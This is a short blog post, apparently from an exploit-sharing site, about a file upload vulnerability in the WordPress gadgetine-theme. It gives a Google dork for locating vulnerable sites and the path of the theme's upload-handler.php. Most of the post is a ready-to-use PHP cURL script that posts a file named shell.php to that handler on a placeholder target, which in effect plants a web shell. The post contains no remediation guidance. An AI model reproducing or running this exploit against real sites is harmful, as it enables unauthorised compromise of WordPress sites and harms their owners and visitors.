![]() |
www.synchronizer.tk |
WordPress gadgetine-theme File Upload Vulnerability
Google Dork : inurl:"wp-content/themes/gadgetine-theme/"
Exploit : http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php
Source code:
<?php$uploadfile="shell.php";
$ch = curl_init("http://www.[target].com/wp-content/themes/gadgetine-theme/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
0 Response to "WordPress gadgetine-theme File Upload Vulnerability"
Posting Komentar